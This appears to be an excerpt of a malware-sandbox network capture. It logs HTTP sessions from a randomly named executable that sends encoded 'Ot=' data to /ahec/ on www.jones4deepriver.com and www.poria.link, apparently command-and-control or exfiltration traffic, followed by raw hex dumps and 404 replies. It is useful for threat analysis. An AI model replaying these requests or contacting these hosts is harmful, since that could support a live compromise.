                                                                        Dec 2, 2023 18:48:58.498862028 CET634INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 02 Dec 2023 17:48:58 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.104971474.208.236.181805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:49:01.020860910 CET1840OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.jones4deepriver.com
                                                                        Origin: http://www.jones4deepriver.com
                                                                        Referer: http://www.jones4deepriver.com/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 77 48 6c 35 5a 67 6f 66 35 52 49 77 43 4f 45 69 39 50 68 51 44 54 74 4f 64 74 4c 4a 43 6e 74 30 6c 51 6a 4d 49 5a 39 53 59 50 61 74 6f 4b 54 6b 62 7a 6d 7a 35 71 36 66 67 6f 50 74 69 66 64 37 50 4c 4c 74 53 68 74 42 62 54 51 31 6d 78 35 58 54 6d 6f 6c 61 6d 78 76 52 65 6e 6d 54 34 46 53 33 69 66 64 36 2b 42 6a 4e 77 35 57 6b 77 75 34 51 79 43 52 31 64 42 46 63 63 78 5a 73 69 65 43 67 41 34 78 57 58 44 37 6f 45 6f 58 33 34 38 53 63 74 46 57 74 45 33 6e 69 30 63 31 75 54 4a 4e 42 77 34 5a 51 4f 54 74 55 66 6e 76 7a 74 53 47 57 46 4b 76 69 76 6f 67 48 73 51 66 44 45 75 2b 6e 30 4b 73 74 78 62 5a 2b 6d 67 6b 52 6c 35 48 78 50 57 61 6d 6a 6e 63 56 46 45 71 49 58 41 49 71 33 57 2f 67 59 4c 2f 6a 66 6b 6e 41 75 62 55 53 74 72 36 4c 38 68 64 50 61 55 6a 64 4a 6b 43 6a 6f 4e 49 53 57 77 37 35 74 75 69 38 54 70 4e 41 73 33 6d 77 75 6d 58 77 6f 79 70 2f 2f 2b 2b 67 4e 70 6c 73 46 52 67 51 31 61 76 65 67 39 74 2f 5a 77 49 49 66 4b 4c 2f 4f 2f 5a 30 6c 2f 2f 63 73 46 67 5a 4e 61 6e 4a 77 54 77 42 75 71 63 72 47 69 52 31 51 2b 52 36 41 49 63 51 6b 5a 70 62 7a 63 50 42 7a 45 5a 6b 6a 6e 2f 67 55 6f 30 6d 70 50 72 36 79 68 4b 4c 77 61 62 4d 32 6c 74 66 34 34 7a 75 6b 69 52 59 5a 41 7a 6b 47 63 62 73 6d 70 69 47 77 36 72 5a 54 4d 72 79 42 61 59 64 68 42 48 75 43 42 57 4b 5a 6f 6e 47 76 54 56 4d 2b 2f 30 70 62 4a 4b 46 69 36 75 62 58 79 2b 58 76 2b 2f 46 75 5a 53 56 31 4e 62 58 33 7a 31 79 54 65 69 46 44 72 4e 51 4c 47 57 7a 72 74 58 37 51 4e 2f 78 6b 31 43 58 61 6a 7a 47 78 39 66 30 4b 72 45 5a 41 52 6b 79 44 35 74 6a 2b 44 79 53 53 35 31 6b 6d 65 72 46 34 76 42 39 62 56 33 6b 79 75 71 78 53 6e 62 59 35 45 34 67 70 67 79 78 39 45 6f 43 57 4d 49 31 67 51 65 49 63 41 58 48 71 64 53 6a 30 43 32 57 36 74 66 62 51 4e 52 35 35 65 72 31 45 6a 2f 75 54 41 68 2f 32 64 72 73 70 6f 58 53 48 73 6b 64 65 64 58 4b 70 6e 44 2b 70 31 6e 44 54 73 78 59 6a 4a 57 64 47 45 35 32 51 57 74 69 52 38 71 35 33 57 7a 4e 57 67 31 33 5a 39 45 33 66 30 6a 61 58 76 76 4a 74 6b 37 65 59 36 2b 33 4d 74 46 54 49 53 6d 6a 4a 32 7a 4e 6b 5a 61 74 46 31 6a 55 34 66 68 62 34 57 57 66 64 35 36 51 52 65 71 4e 6f 69 6d 4c 51 4b 65 4f 57 43 2f 69 45 6f 56 4e 46 4f 36 42 78 35 53 55 42 54 33 38 73 33 67 38 54 58 4e 6c 57 78 4a 4d 4b 2f 6e 39 6e 62 4a 6f 58 44 75 6b 76 34 50 48 75 78 4b 70 43 7a 7a 6e 49 6c 75 44 52 61 56 2f 67 7a 57 6c 46 54 57 36 2f 59 36 77 56 56 31 6f 54 52 76 4e 4a 6e 4b 49 57 67 51 7a 38 4f 6f 71 32 76 72 47 4b 37 52 45 4f 6d 50 5a 2f 4a 68 35 55 6a 67 57 70 34 64 76 39 31 78 6b 6e 65 63 4b 30 63 44 72 57 53 6c 53 75 35 55 54 61 32 5a 39 79 4d 49 4c 4b 65 73 4c 4a 44 32 52 69 44 58 6c 31 62 5a 54 78 6e 69 69 66 78 5a 36 41 6a 77 37 43 62 6f 4c 6b 2b 2f 30 7a 34 47 35 55 36 78 4b 64 43 58 41 71 4e 4e 4e 2b 68 59 2f 50 64 4f 4a 37 78 5a 44 62 6b 4a 7a 4a 6a 46 67 73 47 74 61 47 35 6f 42 4f 74 33 37 2f 48 54 57 72 32 30 50 69 6a 36 53 76 71 38 50 53 65 70 6e 67 4a 78 4d 32 54 64 4f 51 46 4f 4d 6a 2f 4b 2b 6a 45 30 32 70 64 41 44 46 67 36 56 42 32 4f 57 52 54 2b 31 38 45 72 67 59 67 53 76 36 47 67 2f 64 56 54 73 34 4d 4b 54 35 6c 55 6f 55 38 41 37 48 43 6b 61 49 55 33 37 39 63 63 4c 67 2b 4c 59 6c 4e 66 51 6c 4b 37 69 34 30 6e 61 34 44 69 7a 53 2f 48 71 4a 4b 69 71 71 48 6e 72 72 6b 45 4a 38 43 4f 6f 44 68 54 42 7a 62 36 4d 39 56 57 71 51 73 6e 42 7a 34 6a 6c 4f 6e 6d 6c 56 63 59 6c 72 46 4a 56 31 59 69 67 71 66 4d 55 4d 4e 63 56 72 61 34 75 45 63 30 61 72 2f 42 79 7a 7a 38 52 6c 46 50 79 6a 30 4c 62 54 67 57 41 4c 4a 69 35 6a 36 4e 6f 36 76 76 63 50 72 75 6c 7a 7a 4d 39 69 51 6b 70 73 53 51 2b 56 2b 4e 47 48 6e 6e 75 59 6a 39 4e 4a 50 6f 4a 4d 6a 49 63 50 70 5a 4f 36 2b 36
                                                                        Data Ascii: Ot=wmeP+ID8aGX5wHl5Zgof5RIwCOEi9PhQDTtOdtLJCnt0lQjMIZ9SYPatoKTkbzmz5q6fgoPtifd7PLLtShtBbTQ1mx5XTmolamxvRenmT4FS3ifd6+BjNw5Wkwu4QyCR1dBFccxZsieCgA4xWXD7oEoX348SctFWtE3ni0c1uTJNBw4ZQOTtUfnvztSGWFKvivogHsQfDEu+n0KstxbZ+mgkRl5HxPWamjncVFEqIXAIq3W/gYL/jfknAubUStr6L8hdPaUjdJkCjoNISWw75tui8TpNAs3mwumXwoyp//++gNplsFRgQ1aveg9t/ZwIIfKL/O/Z0l//csFgZNanJwTwBuqcrGiR1Q+R6AIcQkZpbzcPBzEZkjn/gUo0mpPr6yhKLwabM2ltf44zukiRYZAzkGcbsmpiGw6rZTMryBaYdhBHuCBWKZonGvTVM+/0pbJKFi6ubXy+Xv+/FuZSV1NbX3z1yTeiFDrNQLGWzrtX7QN/xk1CXajzGx9f0KrEZARkyD5tj+DySS51kmerF4vB9bV3kyuqxSnbY5E4gpgyx9EoCWMI1gQeIcAXHqdSj0C2W6tfbQNR55er1Ej/uTAh/2drspoXSHskdedXKpnD+p1nDTsxYjJWdGE52QWtiR8q53WzNWg13Z9E3f0jaXvvJtk7eY6+3MtFTISmjJ2zNkZatF1jU4fhb4WWfd56QReqNoimLQKeOWC/iEoVNFO6Bx5SUBT38s3g8TXNlWxJMK/n9nbJoXDukv4PHuxKpCzznIluDRaV/gzWlFTW6/Y6wVV1oTRvNJnKIWgQz8Ooq2vrGK7REOmPZ/Jh5UjgWp4dv91xknecK0cDrWSlSu5UTa2Z9yMILKesLJD2RiDXl1bZTxniifxZ6Ajw7CboLk+/0z4G5U6xKdCXAqNNN+hY/PdOJ7xZDbkJzJjFgsGtaG5oBOt37/HTWr20Pij6Svq8PSepngJxM2TdOQFOMj/K+jE02pdADFg6VB2OWRT+18ErgYgSv6Gg/dVTs4MKT5lUoU8A7HCkaIU379ccLg+LYlNfQlK7i40na4DizS/HqJKiqqHnrrkEJ8COoDhTBzb6M9VWqQsnBz4jlOnmlVcYlrFJV1YigqfMUMNcVra4uEc0ar/Byzz8RlFPyj0LbTgWALJi5j6No6vvcPrulzzM9iQkpsSQ+V+NGHnnuYj9NJPoJMjIcPpZO6+6
                                                                        Dec 2, 2023 18:49:01.160701990 CET634INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Date: Sat, 02 Dec 2023 17:49:01 GMT
                                                                        Server: Apache
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.104971574.208.236.181805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:49:03.673619032 CET517OUTGET /ahec/?Ot=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBAHvy1fUTc2Bw==&6d=QlZl HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.jones4deepriver.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Dec 2, 2023 18:49:03.809576988 CET824INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/html
                                                                        Content-Length: 626
                                                                        Connection: close
                                                                        Date: Sat, 02 Dec 2023 17:49:03 GMT
                                                                        Server: Apache
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.1049716172.67.184.73805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:49:09.169353008 CET780OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.poria.link
                                                                        Origin: http://www.poria.link
                                                                        Referer: http://www.poria.link/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 183
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 46 58 69 45 46 63 6e 59 54 68 35 54 57 42 2b 68 39 61 30 31 4b 74 66 59 75 78 39 43 57 42 71 65 69 62 54 79 65 4c 46 45 2b 49 37 6f 6a 68 62 4d 62 72 4f 34 37 44 49 71 64 58 59 76 44 6f 53 32 74 7a 70 49 46 55 7a 63 5a 48 67 6e 47 57 37 64 73 38 46 70 33 56 43 32 4a 6e 4d 63 63 67 72 76 2f 44 67 75 4c 74 59 35 7a 62 74 38 68 52 57 4e 50 2f 36 6f 39 47 53 73 6c 6b 44 6a 5a 6b 43 72 6d 45 62 44 47 62 41 49 57 74 73 4d 78 46 4a 69 30 61 33 53 59 64 43 49 6a 31 42 77 7a 6b 75 73 72 52 77 73 4b 4a 34 44 58 68 6a 42 69 4d 42 50 5a 41 3d 3d
                                                                        Data Ascii: Ot=FXiEFcnYTh5TWB+h9a01KtfYux9CWBqeibTyeLFE+I7ojhbMbrO47DIqdXYvDoS2tzpIFUzcZHgnGW7ds8Fp3VC2JnMccgrv/DguLtY5zbt8hRWNP/6o9GSslkDjZkCrmEbDGbAIWtsMxFJi0a3SYdCIj1BwzkusrRwsKJ4DXhjBiMBPZA==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.1049717172.67.184.73805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:49:11.826541901 CET800OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.poria.link
                                                                        Origin: http://www.poria.link
                                                                        Referer: http://www.poria.link/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 203
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 46 58 69 45 46 63 6e 59 54 68 35 54 58 68 69 68 2f 35 63 31 4c 4e 66 58 67 52 39 43 45 42 72 5a 69 63 62 79 65 50 31 55 2b 64 72 6f 67 42 72 4d 61 76 61 34 34 44 49 71 54 33 59 71 48 6f 53 68 74 7a 55 31 46 56 50 63 5a 48 6b 6e 47 57 4c 64 74 50 39 71 31 46 43 30 63 33 4d 65 53 41 72 76 2f 44 67 75 4c 74 4d 54 7a 62 56 38 68 68 6d 4e 4f 64 43 76 2b 47 53 6a 73 45 44 6a 64 6b 43 76 6d 45 62 62 47 61 74 6a 57 6f 67 4d 78 45 35 69 30 76 62 52 44 74 43 4b 73 56 41 5a 38 56 79 69 6e 78 38 71 4c 4e 63 54 4b 47 36 75 6a 5a 74 63 65 37 5a 43 32 58 58 4a 49 4e 63 4f 73 6c 6a 57 41 6a 43 59 75 71 38 3d
                                                                        Data Ascii: Ot=FXiEFcnYTh5TXhih/5c1LNfXgR9CEBrZicbyeP1U+drogBrMava44DIqT3YqHoShtzU1FVPcZHknGWLdtP9q1FC0c3MeSArv/DguLtMTzbV8hhmNOdCv+GSjsEDjdkCvmEbbGatjWogMxE5i0vbRDtCKsVAZ8Vyinx8qLNcTKG6ujZtce7ZC2XXJINcOsljWAjCYuq8=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.1049719172.67.184.73805828C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 2, 2023 18:49:14.481858969 CET1813OUTPOST /ahec/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.poria.link
                                                                        Origin: http://www.poria.link
                                                                        Referer: http://www.poria.link/ahec/
                                                                        Cache-Control: no-cache
                                                                        Content-Length: 1215
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                        Data Raw: 4f 74 3d 46 58 69 45 46 63 6e 59 54 68 35 54 58 68 69 68 2f 35 63 31 4c 4e 66 58 67 52 39 43 45 42 72 5a 69 63 62 79 65 50 31 55 2b 64 6a 6f 67 79 6a 4d 61 4e 79 34 35 44 49 71 4e 6e 59 72 48 6f 53 5a 74 7a 38 78 46 56 44 71 5a 43 34 6e 55 6c 44 64 6b 65 39 71 76 56 43 30 65 33 4d 64 63 67 72 41 2f 44 51 71 4c 75 30 54 7a 62 56 38 68 69 2b 4e 4c 2f 36 76 34 47 53 73 6c 6b 44 52 5a 6b 43 58 6d 45 54 4c 47 61 70 56 57 62 6f 4d 78 6b 70 69 32 39 44 52 50 74 43 4d 34 31 41 42 38 56 2f 67 6e 78 68 56 4c 49 67 31 4b 42 57 75 67 2f 6f 62 61 4a 42 53 71 55 6a 33 49 35 59 6b 36 46 53 66 54 51 61 37 34 4b 51 68 6d 49 41 66 46 56 51 52 72 61 55 2f 66 6d 6e 33 6a 6d 73 31 7a 38 71 58 73 68 34 49 4e 44 45 32 77 74 78 4e 6a 61 49 6d 48 4a 30 36 33 67 61 64 2f 42 72 46 66 49 73 6c 49 76 51 69 41 49 4b 54 72 35 52 5a 56 32 4b 66 65 7a 2f 6b 4d 46 57 45 30 6e 7a 5a 59 31 78 63 41 71 6d 37 67 51 76 50 57 75 31 4d 36 55 74 34 4c 37 2f 63 63 63 68 72 69 6b 62 57 31 61 36 59 65 68 2f 6e 38 2b 55 61 78 45 77 4c 36 76 32 7a 4d 6b 58 2b 6a 65 2f 42 45 44 5a 6b 73 6b 39 66 78 7a 65 62 74 67 71 51 77 75 30 6e 54 43 53 51 41 2f 72 67 62 39 62 2f 67 33 48 39 44 4f 76 43 70 38 2f 54 50 45 35 41 76 4a 77 54 59 44 2b 74 65 6d 4a 32 33 45 58 55 45 68 33 2f 32 69 4b 62 58 78 55 52 62 45 49 51 4b 65 32 79 51 53 6b 72 53 67 7a 72 55 48 4f 50 4c 75 38 66 6b 4b 77 64 61 39 51 42 48 6a 46 32 6d 58 59 2f 66 43 4f 4e 62 46 44 43 55 4a 44 4a 69 6d 54 61 4d 6f 61 59 4b 41 35 33 69 30 55 72 48 48 4a 43 42 65 49 34 4e 6b 67 34 59 64 73 6b 6f 32 48 46 37 43 32 76 32 52 71 74 6f 49 49 59 79 66 35 76 72 58 5a 62 52 46 62 49 4d 56 52 6f 53 49 31 43 52 67 71 6d 4e 4a 6c 6a 62 4b 33 36 74 63 33 61 6d 6d 5a 51 34 53 65 57 45 4b 48 66 5a 48 56 6e 33 49 69 59 72 78 51 59 38 67 54 54 4f 2f 6d 35 78 34 55 4a 74 74 6a 67 47 72 52 6f 64 7a 68 46 59 34 55 73 5a 42 41 42 4c 4c 46 63 31 58 7a 33 63 36 57 36 54 70 4d 54 45 31 65 62 45 34 47 4a 65 54 76 61 78 70 2b 32 55 36 6d 46 47 37 31 4f 46 71 63 78 74 77 2b 45 51 36 32 51 39 70 41 53 6b 56 49 37 59 6b 56 56 51 75 65 4c 46 6f 68 6d 43 79 36 4d 6f 77 6b 55 31 5a 49 2b 64 4e 64 36 66 74 51 45 70 77 66 68 49 78 49 35 62 45 56 49 70 43 50 6b 79 49 46 6c 2b 45 59 38 47 74 64 44 4f 38 63 61 41 50 76 4f 2f 7a 45 2b 6e 34 70 31 59 54 53 55 76 74 6e 36 33 58 35 6a 77 73 67 58 39 35 38 48 57 61 30 6a 74 75 6a 51 57 5a 62 63 36 33 61 31 77 6a 74 76 4d 31 77 54 37 67 2b 70 71 34 32 79 34 4c 4a 62 54 6f 30 77 55 64 75 69 6c 6a 56 65 55 51 42 4a 74 58 33 45 57 75 54 59 37 32 31 62 45 34 34 58 4a 51 48 6b 54 66 37 71 63 6f 4f 58 63 39 64 4f 72 2b 62 61 68 77 77 53 49 2b 4a 75 6d 48 2f 56 5a 71 4f 53 47 74 2b 39 6d 38 76 31 50 76 69 6f 6f 42 54 76 43 33 70 76 76 70 56 62 49 6d 38 4f 4a 4e 41 52 68 45 74 5a 50 48 54 7a 36 49 77 64 67 47 43 73 6e 77 68 6f 6a 4c 6f 5a 4d 78 41 77 68 66 4e 4f 58 4b 76 69 6c 79 50 56 47 39 56 77 43 73 76 70 49 45 2f 56 4f 79 36 41 7a 52 2b 42 33 30 35 47 4a 4e 61 6d 75 52 2f 49 54 43 7a 69 78 5a 4e 55 49 47 74 61 76 4f 59 49 6e 6f 56 4c 36 4d 35 6d 79 5a 78 75 74 54 48 77 31 32 43 51 6d 68 76 56 67 72 44 37 68 43 44 55 63 74 50 78 33 61 2f 4f 6b 39 4f 45 6a 55 57 72 63 51 43 4a 7a 6e 79 56 69 39 5a 30 32 72 70 4e 70 32 37 61 52 70 64 4c 49 55 53 30 49 2b 43 67 68 6f 46 43 42 2b 76 71 32 33 59 4f 4b 37 78 